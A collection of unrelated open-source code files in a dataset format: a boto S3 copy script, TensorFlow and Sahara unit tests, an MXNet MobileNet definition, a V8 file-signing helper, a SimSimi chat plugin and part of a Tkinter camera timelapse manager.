os.unlink(path)
except:
boto.log.exception('Error copying key: %s' % key.name)
def copy_log(self):
key = self.dst.new_key(self.log_file)
key.set_contents_from_filename(self.log_path)
def main(self):
fp = StringIO.StringIO()
boto.config.dump_safe(fp)
self.notify('%s (%s) Starting' % (self.name, self.instance_id), fp.getvalue())
if self.src and self.dst:
self.copy_keys()
if self.dst:
self.copy_log()
self.notify('%s (%s) Stopping' % (self.name, self.instance_id),
'Copy Operation Complete')
if boto.config.getbool(self.name, 'exit_on_completion', True):
ec2 = boto.connect_ec2()
ec2.terminate_instances([self.instance_id])
| mit |
dendisuhubdy/tensorflow | tensorflow/contrib/constrained_optimization/python/candidates_test.py | 30 | 4188 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for constrained_optimization.python.candidates."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.constrained_optimization.python import candidates
from tensorflow.python.platform import test
class CandidatesTest(test.TestCase):
def test_inconsistent_shapes_for_best_distribution(self):
"""An error is raised when parameters have inconsistent shapes."""
objective_vector = np.array([1, 2, 3])
constraints_matrix = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
with self.assertRaises(ValueError):
_ = candidates.find_best_candidate_distribution(objective_vector,
constraints_matrix)
def test_inconsistent_shapes_for_best_index(self):
"""An error is raised when parameters have inconsistent shapes."""
objective_vector = np.array([1, 2, 3])
constraints_matrix = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
with self.assertRaises(ValueError):
_ = candidates.find_best_candidate_index(objective_vector,
constraints_matrix)
def test_best_distribution(self):
"""Distribution should match known solution."""
objective_vector = np.array(
[0.03053309, -0.06667082, 0.88355145, 0.46529806])
constraints_matrix = np.array(
[[-0.60164551, 0.36676229, 0.7856454, -0.8441711],
[0.00371592, -0.16392108, -0.59778071, -0.56908492]])
distribution = candidates.find_best_candidate_distribution(
objective_vector, constraints_matrix)
# Verify that the solution is a probability distribution.
self.assertTrue(np.all(distribution >= 0))
self.assertAlmostEqual(np.sum(distribution), 1.0)
# Verify that the solution satisfies the constraints.
maximum_constraint_violation = np.amax(
np.dot(constraints_matrix, distribution))
self.assertLessEqual(maximum_constraint_violation, 0)
# Verify that the solution matches that which we expect.
expected_distribution = np.array([0.37872711, 0.62127289, 0, 0])
self.assertAllClose(expected_distribution, distribution, rtol=0, atol=1e-6)
def test_best_index_rank_objectives_true(self):
"""Index should match known solution."""
# Objective ranks = [2, 1, 4, 3].
objective_vector = np.array(
[0.03053309, -0.06667082, 0.88355145, 0.46529806])
# Constraint ranks = [[1, 3, 4, 1], [4, 1, 1, 1]].
constraints_matrix = np.array(
[[-0.60164551, 0.36676229, 0.7856454, -0.8441711],
[0.00371592, -0.16392108, -0.59778071, -0.56908492]])
# Maximum ranks = [4, 3, 4, 3].
index = candidates.find_best_candidate_index(
objective_vector, constraints_matrix, rank_objectives=True)
self.assertEqual(1, index)
def test_best_index_rank_objectives_false(self):
"""Index should match known solution."""
# Objective ranks = [2, 1, 4, 3].
objective_vector = np.array(
[0.03053309, -0.06667082, 0.88355145, 0.46529806])
# Constraint ranks = [[1, 3, 4, 1], [4, 1, 1, 1]].
constraints_matrix = np.array(
[[-0.60164551, 0.36676229, 0.7856454, -0.8441711],
[0.00371592, -0.16392108, -0.59778071, -0.56908492]])
# Maximum ranks = [4, 3, 4, 1].
index = candidates.find_best_candidate_index(
objective_vector, constraints_matrix, rank_objectives=False)
self.assertEqual(3, index)
if __name__ == "__main__":
test.main()
| apache-2.0 |
ucloud/uai-sdk | examples/mxnet/train/cifar/code/symbols/mobilenet.py | 28 | 4928 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
def Conv(data, num_filter=1, kernel=(1, 1), stride=(1, 1), pad=(0, 0), num_group=1, name=None, suffix=''):
conv = mx.sym.Convolution(data=data, num_filter=num_filter, kernel=kernel, num_group=num_group, stride=stride, pad=pad, no_bias=True, name='%s%s_conv2d' %(name, suffix))
bn = mx.sym.BatchNorm(data=conv, name='%s%s_batchnorm' %(name, suffix), fix_gamma=True)
act = mx.sym.Activation(data=bn, act_type='relu', name='%s%s_relu' %(name, suffix))
return act
def get_symbol(num_classes, **kwargs):
data = mx.symbol.Variable(name="data") # 224
conv_1 = Conv(data, num_filter=32, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name="conv_1") # 224/112
conv_2_dw = Conv(conv_1, num_group=32, num_filter=32, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_2_dw") # 112/112
conv_2 = Conv(conv_2_dw, num_filter=64, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_2") # 112/112
conv_3_dw = Conv(conv_2, num_group=64, num_filter=64, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name="conv_3_dw") # 112/56
conv_3 = Conv(conv_3_dw, num_filter=128, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_3") # 56/56
conv_4_dw = Conv(conv_3, num_group=128, num_filter=128, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_4_dw") # 56/56
conv_4 = Conv(conv_4_dw, num_filter=128, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_4") # 56/56
conv_5_dw = Conv(conv_4, num_group=128, num_filter=128, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name="conv_5_dw") # 56/28
conv_5 = Conv(conv_5_dw, num_filter=256, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_5") # 28/28
conv_6_dw = Conv(conv_5, num_group=256, num_filter=256, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_6_dw") # 28/28
conv_6 = Conv(conv_6_dw, num_filter=256, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_6") # 28/28
conv_7_dw = Conv(conv_6, num_group=256, num_filter=256, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name="conv_7_dw") # 28/14
conv_7 = Conv(conv_7_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_7") # 14/14
conv_8_dw = Conv(conv_7, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_8_dw") # 14/14
conv_8 = Conv(conv_8_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_8") # 14/14
conv_9_dw = Conv(conv_8, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_9_dw") # 14/14
conv_9 = Conv(conv_9_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_9") # 14/14
conv_10_dw = Conv(conv_9, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_10_dw") # 14/14
conv_10 = Conv(conv_10_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_10") # 14/14
conv_11_dw = Conv(conv_10, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_11_dw") # 14/14
conv_11 = Conv(conv_11_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_11") # 14/14
conv_12_dw = Conv(conv_11, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_12_dw") # 14/14
conv_12 = Conv(conv_12_dw, num_filter=512, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_12") # 14/14
conv_13_dw = Conv(conv_12, num_group=512, num_filter=512, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name="conv_13_dw") # 14/7
conv_13 = Conv(conv_13_dw, num_filter=1024, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_13") # 7/7
conv_14_dw = Conv(conv_13, num_group=1024, num_filter=1024, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name="conv_14_dw") # 7/7
conv_14 = Conv(conv_14_dw, num_filter=1024, kernel=(1, 1), pad=(0, 0), stride=(1, 1), name="conv_14") # 7/7
pool = mx.sym.Pooling(data=conv_14, kernel=(7, 7), stride=(1, 1), pool_type="avg", name="global_pool")
flatten = mx.sym.Flatten(data=pool, name="flatten")
fc = mx.symbol.FullyConnected(data=flatten, num_hidden=num_classes, name='fc')
softmax = mx.symbol.SoftmaxOutput(data=fc, name='softmax')
return softmax
| apache-2.0 |
Jet-Streaming/framework | deps/v8/tools/testrunner/server/signatures.py | 123 | 2816 | # Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import base64
import os
import subprocess
def ReadFileAndSignature(filename):
with open(filename, "rb") as f:
file_contents = base64.b64encode(f.read())
signature_file = filename + ".signature"
if (not os.path.exists(signature_file) or
os.path.getmtime(signature_file) < os.path.getmtime(filename)):
private_key = "~/.ssh/v8_dtest"
code = subprocess.call("openssl dgst -out %s -sign %s %s" %
(signature_file, private_key, filename),
shell=True)
if code != 0: return [None, code]
with open(signature_file) as f:
signature = base64.b64encode(f.read())
return [file_contents, signature]
def VerifySignature(filename, file_contents, signature, pubkeyfile):
with open(filename, "wb") as f:
f.write(base64.b64decode(file_contents))
signature_file = filename + ".foreign_signature"
with open(signature_file, "wb") as f:
f.write(base64.b64decode(signature))
code = subprocess.call("openssl dgst -verify %s -signature %s %s" %
(pubkeyfile, signature_file, filename),
shell=True)
matched = (code == 0)
if not matched:
os.remove(signature_file)
os.remove(filename)
return matched
| mpl-2.0 |
xme1226/sahara | sahara/tests/unit/utils/test_heat.py | 2 | 10602 | # Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import mock
import testtools
from sahara import exceptions as ex
from sahara.tests.unit import base
from sahara.tests.unit import testutils as tu
from sahara.utils import files as f
from sahara.utils.openstack import heat as h
class TestHeat(testtools.TestCase):
def test_gets(self):
inst_name = "cluster-worker-001"
self.assertEqual(h._get_inst_name("cluster", "worker", 0), inst_name)
self.assertEqual(h._get_inst_name("CLUSTER", "WORKER", 0), inst_name)
self.assertEqual(h._get_port_name(inst_name),
"cluster-worker-001-port")
self.assertEqual(h._get_floating_name(inst_name),
"cluster-worker-001-floating")
self.assertEqual(h._get_floating_assoc_name(inst_name),
"cluster-worker-001-floating-assoc")
self.assertEqual(h._get_volume_name(inst_name, 1),
"cluster-worker-001-volume-1")
self.assertEqual(h._get_volume_attach_name(inst_name, 1),
"cluster-worker-001-volume-attachment-1")
def test_prepare_user_data(self):
userdata = "line1\nline2"
self.assertEqual(h._prepare_userdata(userdata), '"line1",\n"line2"')
class TestClusterTemplate(base.SaharaWithDbTestCase):
"""Checks valid structure of Resources section in generated Heat templates.
1. It checks templates generation with different OpenStack
network installations: Neutron, NovaNetwork with floating Ip auto
assignment set to True or False.
2. Cinder volume attachments.
3. Basic instances creations with multi line user data provided.
4. Anti-affinity feature with proper nova scheduler hints included
into Heat templates.
"""
def _make_node_groups(self, floating_ip_pool=None, volume_type=None):
ng1 = tu.make_ng_dict('master', 42, ['namenode'], 1,
floating_ip_pool=floating_ip_pool, image_id=None,
volumes_per_node=0, volumes_size=0, id=1,
image_username='root', volume_type=None)
ng2 = tu.make_ng_dict('worker', 42, ['datanode'], 1,
floating_ip_pool=floating_ip_pool, image_id=None,
volumes_per_node=2, volumes_size=10, id=2,
image_username='root', volume_type=volume_type)
return ng1, ng2
def _make_cluster(self, mng_network, ng1, ng2, anti_affinity=[]):
return tu.create_cluster("cluster", "tenant1", "general",
"1.2.1", [ng1, ng2],
user_keypair_id='user_key',
neutron_management_network=mng_network,
default_image_id='1', image_id=None,
anti_affinity=anti_affinity)
def _make_heat_template(self, cluster, ng1, ng2):
heat_template = h.ClusterTemplate(cluster)
heat_template.add_node_group_extra(ng1['id'], 1,
get_ud_generator('line1\nline2'))
heat_template.add_node_group_extra(ng2['id'], 1,
get_ud_generator('line2\nline3'))
return heat_template
def test_get_anti_affinity_scheduler_hints(self):
ng1, ng2 = self._make_node_groups('floating')
cluster = self._make_cluster('private_net', ng1, ng2,
anti_affinity=["datanode"])
heat_template = self._make_heat_template(cluster, ng1, ng2)
ng1 = [ng for ng in cluster.node_groups if ng.name == "master"][0]
ng2 = [ng for ng in cluster.node_groups if ng.name == "worker"][0]
expected = ('"scheduler_hints" : '
'{"group": {"Ref": "cluster-aa-group"}},')
actual = heat_template._get_anti_affinity_scheduler_hints(ng2)
self.assertEqual(expected, actual)
expected = ''
actual = heat_template._get_anti_affinity_scheduler_hints(ng1)
self.assertEqual(expected, actual)
def test_load_template_use_neutron(self):
"""Test for Heat cluster template with Neutron enabled.
Two NodeGroups used: 'master' with Ephemeral drive attached and
'worker' with 2 attached volumes 10GB size each
"""
ng1, ng2 = self._make_node_groups('floating', 'vol_type')
cluster = self._make_cluster('private_net', ng1, ng2)
heat_template = self._make_heat_template(cluster, ng1, ng2)
self.override_config("use_neutron", True)
main_template = h._load_template(
'main.heat', {'resources':
heat_template._serialize_resources()})
self.assertEqual(
json.loads(main_template),
json.loads(f.get_file_text(
"tests/unit/resources/"
"test_serialize_resources_use_neutron.heat")))
def test_load_template_use_nova_network_without_autoassignment(self):
"""Checks Heat cluster template with Nova Network enabled.
Nova Network checked without autoassignment of floating ip.
Two NodeGroups used: 'master' with Ephemeral drive attached and
'worker' with 2 attached volumes 10GB size each
"""
ng1, ng2 = self._make_node_groups('floating')
cluster = self._make_cluster(None, ng1, ng2)
heat_template = self._make_heat_template(cluster, ng1, ng2)
self.override_config("use_neutron", False)
main_template = h._load_template(
'main.heat', {'resources':
heat_template._serialize_resources()})
self.assertEqual(
json.loads(main_template),
json.loads(f.get_file_text(
"tests/unit/resources/"
"test_serialize_resources_use_nn_without_autoassignment.heat"))
)
def test_load_template_use_nova_network_with_autoassignment(self):
"""Checks Heat cluster template with Nova Network enabled.
Nova Network checked with autoassignment of floating ip.
Two NodeGroups used: 'master' with Ephemeral drive attached and
'worker' with 2 attached volumes 10GB size each
"""
ng1, ng2 = self._make_node_groups()
cluster = self._make_cluster(None, ng1, ng2)
heat_template = self._make_heat_template(cluster, ng1, ng2)
self.override_config("use_neutron", False)
main_template = h._load_template(
'main.heat', {'resources':
heat_template._serialize_resources()})
self.assertEqual(
json.loads(main_template),
json.loads(f.get_file_text(
"tests/unit/resources/"
"test_serialize_resources_use_nn_with_autoassignment.heat"))
)
def test_load_template_with_anti_affinity_single_ng(self):
"""Checks Heat cluster template with Neutron enabled.
Checks also anti-affinity feature enabled for single node process
in single node group.
"""
ng1 = tu.make_ng_dict('master', 42, ['namenode'], 1,
floating_ip_pool='floating', image_id=None,
volumes_per_node=0, volumes_size=0, id=1,
image_username='root')
ng2 = tu.make_ng_dict('worker', 42, ['datanode'], 2,
floating_ip_pool='floating', image_id=None,
volumes_per_node=0, volumes_size=0, id=2,
image_username='root')
cluster = tu.create_cluster("cluster", "tenant1", "general",
"1.2.1", [ng1, ng2],
user_keypair_id='user_key',
neutron_management_network='private_net',
default_image_id='1',
anti_affinity=['datanode'], image_id=None)
aa_heat_template = h.ClusterTemplate(cluster)
aa_heat_template.add_node_group_extra(ng1['id'], 1,
get_ud_generator('line1\nline2'))
aa_heat_template.add_node_group_extra(ng2['id'], 2,
get_ud_generator('line2\nline3'))
self.override_config("use_neutron", True)
main_template = h._load_template(
'main.heat', {'resources':
aa_heat_template._serialize_resources()})
self.assertEqual(
json.loads(main_template),
json.loads(f.get_file_text(
"tests/unit/resources/"
"test_serialize_resources_aa.heat")))
class TestClusterStack(testtools.TestCase):
@mock.patch("sahara.context.sleep", return_value=None)
def test_wait_completion(self, _):
stack = FakeHeatStack('CREATE_IN_PROGRESS', 'CREATE_COMPLETE')
h.wait_stack_completion(stack)
stack = FakeHeatStack('UPDATE_IN_PROGRESS', 'UPDATE_COMPLETE')
h.wait_stack_completion(stack)
stack = FakeHeatStack('DELETE_IN_PROGRESS', 'DELETE_COMPLETE')
h.wait_stack_completion(stack)
stack = FakeHeatStack('CREATE_IN_PROGRESS', 'CREATE_FAILED')
with testtools.ExpectedException(
ex.HeatStackException,
value_re="Heat stack failed with status CREATE_FAILED"):
h.wait_stack_completion(stack)
class FakeHeatStack(object):
def __init__(self, stack_status=None, new_status=None, stack_name=None):
self.stack_status = stack_status or ''
self.new_status = new_status or ''
self.stack_name = stack_name or ''
def get(self):
self.stack_status = self.new_status
@property
def status(self):
s = self.stack_status
return s[s.index('_') + 1:]
def get_ud_generator(s):
def generator(*args, **kwargs):
return s
return generator
| apache-2.0 |
evilbinary/robot | plugins/simsimi.py | 1 | 4085 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# Author : cold
# E-mail : [email protected]
# Date : 14/01/16 11:33:32
# Desc : SimSimi插件
#
import json
from tornadohttpclient import TornadoHTTPClient
import config
import random
from plugins import BasePlugin
class SimSimiTalk(object):
""" 模拟浏览器与SimSimi交流
:params http: HTTP 客户端实例
:type http: ~tornadhttpclient.TornadoHTTPClient instance
"""
def __init__(self, http = None):
self.http = http or TornadoHTTPClient()
if not http:
self.http.set_user_agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.71 Chrome/28.0.1500.71 Safari/537.36")
self.http.debug = getattr(config, "TRACE", False)
self.http.validate_cert = False
self.http.set_global_headers({"Accept-Charset": "UTF-8,*;q=0.5"})
self.url = "http://www.simsimi.com/func/req"
self.params = {"lc":"zh", "ft":0.0}
self.ready = False
self.fetch_kwargs = {}
if config.SimSimi_Proxy:
self.fetch_kwargs.update(proxy_host = config.SimSimi_Proxy[0],
proxy_port = config.SimSimi_Proxy[1])
self._setup_cookie()
def _setup_cookie(self):
def callback(resp):
self.ready = True
self.http.get("http://www.simsimi.com", callback = callback)
def talk(self, msg, callback):
""" 聊天
:param msg: 信息
:param callback: 接收响应的回调
"""
headers = {"Referer":"http://www.simsimi.com/talk.htm",
"Accept":"application/json, text/javascript, */*; q=0.01",
"Accept-Language":"zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
"Content-Type":"application/json; charset=utf-8",
"X-Requested-With":"XMLHttpRequest",
}
if not msg.strip():
return callback(u"小的在")
params = {"msg":msg.encode("utf-8")}
params.update(self.params)
def _talk(resp):
data = {}
if resp.body:
try:
data = json.loads(resp.body)
except ValueError:
pass
callback(data.get("。。。。"))
self.http.get(self.url, params, headers = headers,
callback = _talk)
class SimSimiPlugin(BasePlugin):
simsimi = None
def is_match(self, form_uin, content, type):
if not getattr(config, "SimSimi_Enabled", False):
return False
else:
self.simsimi = SimSimiTalk()
if type == "g" and random.choice('abcd')!='a':
if self.nickname !=None:
if content.startswith(self.nickname.strip()) or \
content.endswith(self.nickname.strip()) or \
content.startswith(config.QQ_GROUP_NICK.strip()) or \
content.endswith(config.QQ_GROUP_NICK.strip()) or \
content.startswith('@'+config.QQ_GROUP_NICK.strip()) or \
content.endswith('@'+config.QQ_GROUP_NICK.strip()):
self.content = content.strip(self.nickname).strip(config.QQ_GROUP_NICK.strip())
return True
else:
return False
else:
self.content = content
return True
return False
def handle_message(self, callback):
self.simsimi.talk(self.content, callback)
if __name__ == "__main__":
import threading,time
simsimi = SimSimiTalk()
def callback(response):
print response
simsimi.http.stop()
def talk():
while 1:
if simsimi.ready:
simsimi.talk("nice to meet you", callback)
break
else:
time.sleep(1)
t = threading.Thread(target = talk)
t.setDaemon(True)
t.start()
simsimi.http.start()
| mit |
allmyservos/allmyservos | contrib/AllMyServos/Camera/TkTimelapseManager.py | 1 | 29896 | #!/usr/bin/python
#######################################################################
# AllMyServos - Fun with PWM
# Copyright (C) 2015 Donate BTC:14rVTppdYQzLrqay5fp2FwP3AXvn3VSZxQ
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#######################################################################
import datetime, Tkinter, JsonBlob, Camera, Timelapse
from __bootstrap import AmsEnvironment
from Tkinter import *
from TkBlock import *
## UI for camera media
class TkTimelapseManager(TkPage):
def __init__(self, parent, gui, **options):
""" Initializes the TkTimelapseManager object
@param parent
@param gui
@param options
"""
super(TkTimelapseManager,self).__init__(parent, gui, **options)
try:
self.gui.kbthread
except:
self.gui.kbthread = Keyboard.KeyboardThread.GetInstance()
self.kbthread = self.gui.kbthread
try:
self.gui.camera
except:
self.gui.camera = Camera.Camera(self.gui.scheduler, self.kbthread, self.notifier)
self.camera = self.gui.camera
self.timelapse = Timelapse.Timelapse(self.camera)
def setup(self):
""" setup gui menu
"""
try:
self.gui.menus['cam']
except:
self.gui.menus['cam'] = Tkinter.Menu(self.gui.menubar, tearoff=0, bg=self.colours['menubg'], fg=self.colours['menufg'], activeforeground=self.colours['menuactivefg'], activebackground=self.colours['menuactivebg'])
self.addMenu(label="Camera", menu=self.gui.menus['cam'])
self.gui.menus['cam'].add_command(label="Timelapse", command=self.OnManageClick)
#=== VIEWS ===#
def listProfiles(self):
""" view - list timelapse profiles
"""
self.open()
self.widgets['mainlabel'] = Tkinter.Label(self.widgets['tframe'],text='Camera / Timelapse', anchor=NW, bg=self.colours['bg'], fg=self.colours['headingfg'], font=self.fonts['heading'])
self.widgets['mainlabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['addprofile'] = Tkinter.Button(self.widgets['tframe'],text=u"Add Profile", image=self.images['add'], command=self.OnAddProfileClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['addprofile'].grid(column=6,row=self.gridrow)
self.gridrow += 1
if (any(self.profiles)):
self.widgets['nameLabel'] = Tkinter.Label(self.widgets['tframe'],text='Name', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['nameLabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['modeLabel'] = Tkinter.Label(self.widgets['tframe'],text='Mode', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['modeLabel'].grid(column=1,row=self.gridrow,sticky='EW')
self.widgets['waitLabel'] = Tkinter.Label(self.widgets['tframe'],text='Interval', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['waitLabel'].grid(column=2,row=self.gridrow,sticky='EW')
self.widgets['lengthLabel'] = Tkinter.Label(self.widgets['tframe'],text='Length', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['lengthLabel'].grid(column=3,row=self.gridrow,sticky='EW')
self.widgets['actLabel'] = Tkinter.Label(self.widgets['tframe'],text='Activate', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['actLabel'].grid(column=4,row=self.gridrow,sticky='EW')
self.widgets['editLabel'] = Tkinter.Label(self.widgets['tframe'],text='Edit', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['editLabel'].grid(column=5,row=self.gridrow,sticky='EW')
self.widgets['editLabel'] = Tkinter.Label(self.widgets['tframe'],text='Media', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['editLabel'].grid(column=6,row=self.gridrow,sticky='EW')
self.gridrow += 1
rowcolour = self.colours['rowbg']
rowcount = 1
for k, v in self.profiles.items():
rowcolour = self.colours['rowaltbg'] if rowcount % 2 == 0 else self.colours['rowbg']
rowcount += 1
self.widgets['nameData{}'.format(k)] = Tkinter.Label(self.widgets['tframe'],text=v.jsonData['name'], bg=rowcolour, fg=self.colours['fg'], height=2)
self.widgets['nameData{}'.format(k)].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['modeData{}'.format(k)] = Tkinter.Label(self.widgets['tframe'],text=v.jsonData['cap_mode'], bg=rowcolour, fg=self.colours['fg'], height=2)
self.widgets['modeData{}'.format(k)].grid(column=1,row=self.gridrow,sticky='EW')
self.widgets['waitData{}'.format(k)] = Tkinter.Label(self.widgets['tframe'],text=v.jsonData['{}_wait'.format(v.jsonData['cap_mode'])], bg=rowcolour, fg=self.colours['fg'], height=2)
self.widgets['waitData{}'.format(k)].grid(column=2,row=self.gridrow,sticky='EW')
self.widgets['lengthData{}'.format(k)] = Tkinter.Label(self.widgets['tframe'],text=v.jsonData['video_length'] if v.jsonData['cap_mode'] == 'video' else '-', bg=rowcolour, fg=self.colours['fg'], height=2)
self.widgets['lengthData{}'.format(k)].grid(column=3,row=self.gridrow,sticky='EW')
self.widgets['actButton{}'.format(k)] = Tkinter.Button(self.widgets['tframe'],text=u"Activate", image=self.images['stop'] if v.jsonData['active'] else self.images['play'], bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'], command=lambda x = k:self.OnActivateClick(x))
self.widgets['actButton{}'.format(k)].grid(column=4,row=self.gridrow,sticky='EW')
self.widgets['editButton{}'.format(k)] = Tkinter.Button(self.widgets['tframe'],text=u"Edit", image=self.images['process'], bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'], command=lambda x = k:self.OnEditProfileClick(x))
self.widgets['editButton{}'.format(k)].grid(column=5,row=self.gridrow,sticky='EW')
self.widgets['mediaButton{}'.format(k)] = Tkinter.Button(self.widgets['tframe'],text=u"Media", image=self.images['image'], bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'], command=lambda x = k:self.OnMediaClick(x))
self.widgets['mediaButton{}'.format(k)].grid(column=6,row=self.gridrow,sticky='EW')
self.gridrow += 1
else:
self.widgets['noLabel'] = Tkinter.Label(self.widgets['tframe'],text='There are currently no timelapse profiles', anchor=W, bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['noLabel'].grid(column=0,row=self.gridrow,sticky='EW')
def editProfile(self):
""" view - edit profile
"""
self.open()
self.widgets['mainlabel'] = Tkinter.Label(self.widgets['tframe'],text='Camera / Timelapse / Edit', anchor=NW, bg=self.colours['bg'], fg=self.colours['headingfg'], font=self.fonts['heading'])
self.widgets['mainlabel'].grid(column=0,row=self.gridrow,columnspan=2,pady=10,sticky='EW')
self.gridrow += 1
self.widgets['activeLabel'] = Tkinter.Label(self.widgets['tframe'],text='Active', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['activeLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.variables['active'] = Tkinter.BooleanVar()
self.variables['active'].set(self.profile.jsonData['active'])
self.widgets['activeentry'] = Tkinter.Checkbutton(self.widgets['tframe'], variable=self.variables['active'], text='', anchor=W, command=self.OnToggleActive, bg=self.colours['inputbg'], fg=self.colours['inputfg'], activebackground=self.colours['activebg'], selectcolor=self.colours['inputbg'], disabledforeground=self.colours['greyborder'])
self.widgets['activeentry'].grid(column=1,row=self.gridrow, padx=5, sticky="W")
self.gridrow += 1
self.widgets['nameLabel'] = Tkinter.Label(self.widgets['tframe'],text='Name', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['nameLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
